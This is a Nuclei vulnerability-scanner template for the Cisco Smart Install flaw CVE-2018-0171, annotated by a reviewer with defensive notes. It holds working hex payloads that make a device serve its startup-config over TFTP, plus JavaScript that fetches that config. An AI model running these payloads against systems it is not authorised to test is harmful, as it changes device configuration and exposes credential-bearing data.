# Reviewer notes (defensive context):
# - The description below is the advisory text for a packet-validation flaw (reload / code
#   execution). The template name says "Configuration Download", and the requests on this page
#   ask the device to serve its startup-config and then fetch it over TFTP.
#   NOTE(review): that looks like use of the Smart Install protocol itself rather than the
#   memory-corruption bug; confirm the CVE mapping, since a device may match here whenever
#   Smart Install is reachable, whatever its patch level.
# - Hardening for a finding: disable Smart Install where it is not used (`no vstack`) and
#   filter TCP/4786 so that only the intended director can reach it.
id: CVE-2018-0171

info:
  name: Cisco Smart Install - Configuration Download
  author: ritikchaddha,matejsmycka
  severity: critical
  description: |
    A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data.
  reference:
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
    - https://nvd.nist.gov/vuln/detail/CVE-2018-0171
    - https://github.com/AlrikRr/Cisco-Smart-Exploit
    - http://www.securitytracker.com/id/1040580
    - https://ics-cert.us-cert.gov/advisories/ICSA-18-107-04
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-0171
    cwe-id: CWE-20,CWE-787
    epss-score: 0.93123
    epss-percentile: 0.99786
    # The CPE names a single IOS release; it is metadata and is not evaluated by the
    # requests on this page.
    cpe: cpe:2.3:o:cisco:ios:15.2\(5\)e:*:*:*:*:*:*:*
  metadata:
    verified: true
    # Two requests in total: one tcp step and one javascript step.
    max-request: 2
    vendor: cisco
    product: ios
    shodan-query: 'port:4786 "Smart Install"'
  tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev,udp,vkev
# Two stages joined with &&, so the javascript stage runs only if the tcp stage reports a match:
#   tcp(1)        - two hex-encoded messages to TCP/4786. The second one carries the ASCII text
#                   "configure tftp-server nvram:startup-config", so this stage changes the
#                   device's configuration; it is not a read-only probe.
#   javascript(1) - a TFTP read of "startup-config" over UDP/69.
# Nothing on this page reverts the tftp-server setting. After a run the startup-config stays
# retrievable over TFTP until the entry is removed on the device
# (`no tftp-server nvram:startup-config`), so cleanup belongs in the scan procedure.
flow: tcp(1) && javascript(1)
tcp:
|
|
- inputs:
|
|
- data: 00000001000000010000000A00000050FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF555CCA6800000000000000000000000000000000FFFFFFFF00000001
|
|
type: hex
|
|
- data: 000000010000000100000008000001680001001400000001000000000021D863A560000000020154636F6E66696775726520746674702D736572766572206E7672616D3A737461727475702D636F6E666967000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|
|
type: hex
host:
  - "{{Hostname}}"
# Fixed destination port for both hex inputs; it is the same port the shodan-query in the
# metadata searches for.
port: 4786

# An empty word is contained in every string, so this matcher presumably succeeds for whatever
# the device sends back; it does not show that the device accepted the command.
# `internal: true` keeps this match out of the reported results, so it only gates the flow.
# NOTE(review): the actual evidence is produced by the javascript stage's matchers.
matchers:
  - type: word
    part: raw
    words:
      - ""
    internal: true
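# Second stage: fetch the file that the tcp stage asked the device to expose over TFTP.
# Changes from the original code block: the UDP socket is now closed (also when Recv throws),
# and the statement that lacked a semicolon is terminated.
# NOTE(review): the file ends with a `# digest:` signature line; an edited template presumably
# no longer verifies against it and has to be re-signed.
javascript:
  # Gate: the code runs only if the UDP probe of Host:Port succeeds.
  # NOTE(review): UDP has no handshake, so an open/closed verdict is best-effort and a
  # filtered port can produce a false negative here.
  - pre-condition: |
      isUDPPortOpen(Host,Port);

    code: |
      const net = require("nuclei/net");

      // TFTP read request (opcode 0x0001): file "startup-config", transfer mode "octet".
      const readRequest = bytes.NewBuffer();
      readRequest.WriteString("\x00\x01startup-config\x00octet\x00");

      // Opcode 0x0005 is TFTP ERROR; this short form is deliberately malformed.
      const abortPacket = bytes.NewBuffer();
      abortPacket.WriteString("\x00\x05error");

      const conn = net.Open('udp', `${Host}:${Port}`);
      let resp;
      try {
        conn.SendHex(readRequest.Hex());
        // Reads at most 4096 bytes. With TFTP's default 512-byte blocks this is presumably
        // only the first part of the file, so the matchers see the beginning of the config.
        resp = conn.Recv(4096);

        // Send malformed packet otherwise TFTP will not respond for around minute
        conn.SendHex(abortPacket.Hex());
      } finally {
        // Release the socket on every path; the original left it open.
        conn.Close();
      }

      // Evaluated last so that it becomes the script's result, which the matchers inspect.
      resp;

    args:
      Host: "{{Host}}"
      # 69/udp is the standard TFTP port.
      Port: 69

    # All three words must be present (condition: and) in the returned data.
    # The data is device configuration and may hold credential material (password hashes,
    # SNMP communities); treat stored raw responses and debug logs from this check as sensitive.
    matchers:
      - type: word
        words:
          - 'boot-start-marker'
          - 'version'
          - 'NVRAM'
        condition: and

    # Reports only the major.minor number that follows "version" in the returned text.
    extractors:
      - type: regex
        regex:
          - "version\\s+(\\d+\\.\\d+)"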
# digest: 4a0a00473045022100a072aed4e1f1b0608e853a90b7026aa31622663d0e0309ef4178a789a5dffb3802200dcaccd55f43030c8adf16004a0f2c03f5891b302ec4cd5529a403f25e9eb103:922c64590222798bb761d5b6d8e72950 |